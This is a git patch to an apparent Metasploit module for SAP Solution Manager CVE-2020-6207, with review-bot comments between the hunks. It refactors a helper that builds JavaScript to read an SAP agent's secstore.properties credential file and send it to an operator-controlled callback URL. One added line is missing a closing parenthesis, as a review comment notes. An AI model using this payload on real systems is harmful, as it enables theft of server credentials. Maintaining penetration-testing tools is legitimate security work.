From 3f2a07bdcaddfac2ddf05c31400a749c2e88404c Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Thu, 26 Feb 2026 11:45:54 -0500
Subject: [PATCH] Update #make_steal_credentials_payload to just take url
---
 .../core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb | 4 ++--
 modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb | 6 ++----
 2 files changed, 4 insertions(+), 6 deletions(-)
diff --git a/lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb b/lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb
index 0ee2ad41c8..7c71a4d9c8 100644
--- a/lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb
+++ b/lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb
@@ -49,8 +49,8 @@ module Msf
 end
 # Make payload for steal credentials for SolMan server from agent
- def make_steal_credentials_payload(instance, host, port, url)
- command = "var u = new Packages.java.net.URL(\"http://#{host}:#{port}#{url}\");"
+ def make_steal_credentials_payload(instance, url)
+ command = "var u = new Packages.java.net.URL(\"#{url}\");"
 command << 'var o = Packages.java.lang.System.getProperty("os.name").toLowerCase();'
 command << 'if (o.indexOf("win") >= 0) '
 command << "{var p = Packages.java.nio.file.Paths.get(\"C:\\\\usr\\\\sap\\\\DAA\\\\#{instance}\\\\SMDAgent\\\\configuration\\\\secstore.properties\");} "
diff --git a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
index 31924b2655..abd20a5c40 100644
--- a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
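Review bot: The comment above `make_steal_credentials_payload` does not state the new contract for `url`: the method no longer prepends `http://host:port`, so the argument has to be a complete absolute URL, and a caller that still passes a bare path would hand `java.net.URL` a string it cannot parse. I would add `# @param url [String] absolute URL (scheme, host, port and path) that the generated script connects to`, plus a matching `@param instance` line. `url` is also interpolated unescaped into a double-quoted JavaScript literal, so a `"` or `\` in it would break the generated script; rejecting such values up front with `raise ArgumentError, 'url must not contain quotes or backslashes' if url.match?(/["\\]/)` keeps the failure local. The method body continues past the end of the hunk.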
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
 OptString.new('SSRF_METHOD', [true, 'HTTP method for SSRF', 'GET'], conditions: %w[ACTION == SSRF]),
 OptString.new('SSRF_URI', [true, 'URI for SSRF', 'http://127.0.0.1:80/'], conditions: %w[ACTION == SSRF]),
 OptString.new('COMMAND', [true, 'Command for execute in agent', 'id'], conditions: %w[ACTION == EXEC]),
- OptAddress.new('SRVHOST', [ true, 'The local IP address to listen HTTP requests from agents', '192.168.1.1' ], conditions: %w[ACTION == SECSTORE]),
+ OptAddressRoutable.new('SRVHOST', [ false, 'The local IP address to listen HTTP requests from agents' ], conditions: %w[ACTION == SECSTORE]),
 OptPort.new('SRVPORT', [ true, 'The local port to listen HTTP requests from agents', 8000 ], conditions: %w[ACTION == SECSTORE]),
 OptString.new('AGENT', [true, 'Agent server name for exec command or SSRF', 'agent_server_name'], conditions: ['ACTION', 'in', %w[SSRF EXEC SECSTORE]]),
 ]
@@ -68,8 +68,6 @@ class MetasploitModule < Msf::Auxiliary
 def setup_xml_and_variables
 @host = datastore['RHOSTS']
 @port = datastore['RPORT']
- @srv_host = srvhost
- @srv_port = datastore['SRVPORT']
 @path = datastore['TARGETURI']
 @agent_name = datastore['AGENT']
@@ -255,7 +253,7 @@ class MetasploitModule < Msf::Auxiliary
 }
 }
 )
- @creds_payload = make_steal_credentials_payload(agent[:instanceName], @srv_host, @srv_port, "/#{@script_name}")
+ @creds_payload = make_steal_credentials_payload(agent[:instanceName], get_uri("/#{@script_name}")
 print_status("Start script: #{@script_name} with payload for retrieving SolMan credentials file from agent: #{@agent_name}")
 send_soap_request(make_soap_body(@agent_name, @script_name, @creds_payload))
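Review bot: The `SRVHOST` description in the first hunk no longer tells the operator what happens when the option is left empty, now that it is optional and has no default. If the callback address is meant to be chosen automatically for the SECSTORE action, the text should say so, e.g. `'The local IP address agents connect back to over HTTP (auto-selected when unset)'`. That behaviour is inferred, because the code that resolves the address is not part of this diff. The options array starts before the hunk.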
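Review bot: The added `@creds_payload` line in the third hunk is missing a closing parenthesis, so the file will not parse: `get_uri(` is closed but the outer `make_steal_credentials_payload(` call is not. It should read `@creds_payload = make_steal_credentials_payload(agent[:instanceName], get_uri("/#{@script_name}"))`. Please also confirm that `get_uri` accepts a path argument; its definition is not visible here, and if it expects something else the script name would have to be appended to its result instead. The enclosing method starts and ends outside the hunk.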